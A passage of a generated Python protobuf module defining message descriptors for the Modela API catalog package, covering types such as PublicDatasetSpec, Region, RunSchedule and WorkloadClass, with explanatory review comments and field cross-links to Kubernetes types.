serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='citation', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.citation', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rows', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.rows', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='columns', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.columns', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fileSize', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.fileSize', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='targetColumn', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.targetColumn', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='industry', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.industry', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='imbalanced', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.imbalanced', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasourceCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.datasourceCR', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasetCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.datasetCR', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='studyCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.studyCR', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataProductCR', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.dataProductCR', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=5989,
serialized_end=6299,
)
# ---- protoc-generated message descriptors (catalog.v1alpha1) ----
# NOTE(review): generated protobuf code. Field layouts, indexes, numbers and
# the serialized_start/serialized_end offsets must stay in sync with the
# serialized file descriptor, so only comments are added in this section.

# Descriptor for catalog.v1alpha1.Region: four string fields (code,
# defaultDatacenterName, location, billingCode) plus repeated (label=3)
# message field 'datacenters' (linked to _DATACENTER later in this module).
_REGION = _descriptor.Descriptor(
name='Region',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.code', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='defaultDatacenterName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.defaultDatacenterName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='location', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.location', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='billingCode', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.billingCode', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datacenters', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Region.datacenters', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6302,
serialized_end=6484,
)
# Descriptor for catalog.v1alpha1.ResourceSpec: workloadClassName (string),
# enable (bool) and message field 'requirements' (linked below to
# k8s.io core/v1 ResourceRequirements).
_RESOURCESPEC = _descriptor.Descriptor(
name='ResourceSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='workloadClassName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec.workloadClassName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec.enable', index=1,
number=2, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='requirements', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ResourceSpec.requirements', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6486,
serialized_end=6607,
)
# Descriptor for catalog.v1alpha1.RocAucCurve: a single repeated message
# field 'values' (linked below to _CURVEPOINT, shared with _PRCURVE).
_ROCAUCCURVE = _descriptor.Descriptor(
name='RocAucCurve',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RocAucCurve',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='values', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RocAucCurve.values', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6609,
serialized_end=6707,
)
# Descriptor for catalog.v1alpha1.RunSchedule: enabled (bool), startTime and
# endTime (message fields, cross-linked to k8s meta/v1 time descriptors later
# in this module), cron and type (strings).
_RUNSCHEDULE = _descriptor.Descriptor(
name='RunSchedule',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='enabled', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.enabled', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='startTime', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.startTime', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='endTime', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.endTime', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cron', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.cron', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.RunSchedule.type', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6710,
serialized_end=6897,
)
# Descriptor for catalog.v1alpha1.StakeHolder: accountName (string) and
# repeated string field 'roles'.
_STAKEHOLDER = _descriptor.Descriptor(
name='StakeHolder',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='accountName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder.accountName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='roles', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.StakeHolder.roles', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6899,
serialized_end=6948,
)
# Descriptor for catalog.v1alpha1.UserRoleClass: the usual k8s object shape —
# 'metadata' (ObjectMeta) and 'spec' (UserRoleClassSpec), linked below.
_USERROLECLASS = _descriptor.Descriptor(
name='UserRoleClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClass.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=6951,
serialized_end=7124,
)
# Descriptor for catalog.v1alpha1.UserRoleClassList: 'metadata' (ListMeta)
# and repeated 'items' (UserRoleClass), linked below.
_USERROLECLASSLIST = _descriptor.Descriptor(
name='UserRoleClassList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7127,
serialized_end=7299,
)
# Descriptor for catalog.v1alpha1.UserRoleClassSpec: repeated message field
# 'rules' (linked below to k8s rbac/v1 PolicyRule).
_USERROLECLASSSPEC = _descriptor.Descriptor(
name='UserRoleClassSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='rules', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.UserRoleClassSpec.rules', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7301,
serialized_end=7367,
)
# Descriptor for catalog.v1alpha1.VizUri: two string fields, name and uri.
_VIZURI = _descriptor.Descriptor(
name='VizUri',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='uri', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.VizUri.uri', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7369,
serialized_end=7404,
)
# Descriptor for catalog.v1alpha1.WorkloadClass: 'metadata' (ObjectMeta) and
# 'spec' (WorkloadClassSpec), linked below.
_WORKLOADCLASS = _descriptor.Descriptor(
name='WorkloadClass',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClass.spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7407,
serialized_end=7580,
)
# Descriptor for catalog.v1alpha1.WorkloadClassList: 'metadata' (ListMeta)
# and repeated 'items' (WorkloadClass), linked below.
_WORKLOADCLASSLIST = _descriptor.Descriptor(
name='WorkloadClassList',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassList.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7583,
serialized_end=7755,
)
# Descriptor for catalog.v1alpha1.WorkloadClassSpec: resourcesTemplate
# (message, field 1), repeated string 'frameworks' (field 3 — field number 2
# is absent in the schema), repeated message 'libs' (field 4), and strings
# os/osVersion (fields 5 and 6).
_WORKLOADCLASSSPEC = _descriptor.Descriptor(
name='WorkloadClassSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resourcesTemplate', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.resourcesTemplate', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='frameworks', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.frameworks', index=1,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='libs', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.libs', index=2,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='os', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.os', index=3,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='osVersion', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.WorkloadClassSpec.osVersion', index=4,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=7758,
serialized_end=8002,
)
# Cross-link every message-typed field to its Descriptor object. protoc emits
# these assignments after all Descriptor definitions, because forward and
# imported references (the k8s.io *_pb2 descriptors) only exist at this point.
_ALGORITHM.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_ALGORITHM.fields_by_name['spec'].message_type = _ALGORITHMSPEC
_ALGORITHMLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_ALGORITHMLIST.fields_by_name['items'].message_type = _ALGORITHM
_ALGORITHMSPEC.fields_by_name['integerParameters'].message_type = _INTPARAMETER
_ALGORITHMSPEC.fields_by_name['floatParameters'].message_type = _FLOATPARAMETER
_ALGORITHMSPEC.fields_by_name['categoricalParameters'].message_type = _CATEGORICALPARAMETER
_CLOUD.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_CLOUD.fields_by_name['spec'].message_type = _CLOUDSPEC
_CLOUD.fields_by_name['status'].message_type = _CLOUDSTATUS
_CLOUDLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_CLOUDLIST.fields_by_name['items'].message_type = _CLOUD
_CLOUDSPEC.fields_by_name['machineClasses'].message_type = _MACHINECLASS
_CLOUDSPEC.fields_by_name['gpuClasses'].message_type = _GPUCLASS
_CLOUDSPEC.fields_by_name['regions'].message_type = _REGION
_CLOUDSTATUS.fields_by_name['machineCosts'].message_type = _MACHINECLASSCOST
_CLOUDSTATUS.fields_by_name['gpuCosts'].message_type = _GPUCLASSCOST
_CONFUSIONMATRIX.fields_by_name['rows'].message_type = _CONFUSIONMATRIXROW
_GPUCLASS.fields_by_name['gpumem'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_GPUCLASSCOST.fields_by_name['costPerMinute'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_GPUCLASSCOST.fields_by_name['costSpot'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MLFRAMEWORK.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_MLFRAMEWORK.fields_by_name['spec'].message_type = _MLFRAMEWORKSPEC
_MLFRAMEWORKLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_MLFRAMEWORKLIST.fields_by_name['items'].message_type = _MLFRAMEWORK
_MACHINECLASS.fields_by_name['mem'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MACHINECLASSCOST.fields_by_name['costPerMinute'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MACHINECLASSCOST.fields_by_name['costSpot'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2._QUANTITY
_MODELDEPLOYMENTSTATUS.fields_by_name['deploymentRef'].message_type = k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2._OBJECTREFERENCE
_MODELDEPLOYMENTSTATUS.fields_by_name['serviceRef'].message_type = k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2._OBJECTREFERENCE
_MODELDEPLOYMENTSTATUS.fields_by_name['lastPredictionTime'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_MODELDEPLOYMENTSTATUS.fields_by_name['deployedAt'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_MODELDEPLOYMENTSTATUS.fields_by_name['releasedAt'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_MODELDEPLOYMENTSTATUS.fields_by_name['approvedAt'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._TIME
_NOTIFICATIONSPEC_SELECTORENTRY.containing_type = _NOTIFICATIONSPEC
_NOTIFICATIONSPEC.fields_by_name['selector'].message_type = _NOTIFICATIONSPEC_SELECTORENTRY
_PRCURVE.fields_by_name['values'].message_type = _CURVEPOINT
_PRETRAINEDMODEL.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_PRETRAINEDMODEL.fields_by_name['spec'].message_type = _PRETRAINEDMODELSPEC
_PRETRAINEDMODELLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_PRETRAINEDMODELLIST.fields_by_name['items'].message_type = _PRETRAINEDMODEL
_PUBLICDATASET.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._OBJECTMETA
_PUBLICDATASET.fields_by_name['spec'].message_type = _PUBLICDATASETSPEC
_PUBLICDATASETLIST.fields_by_name['metadata'].message_type = k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2._LISTMETA
_PUBLICDATASETLIST.fields_by_name['items'].message_type = _PUBLICDATASET
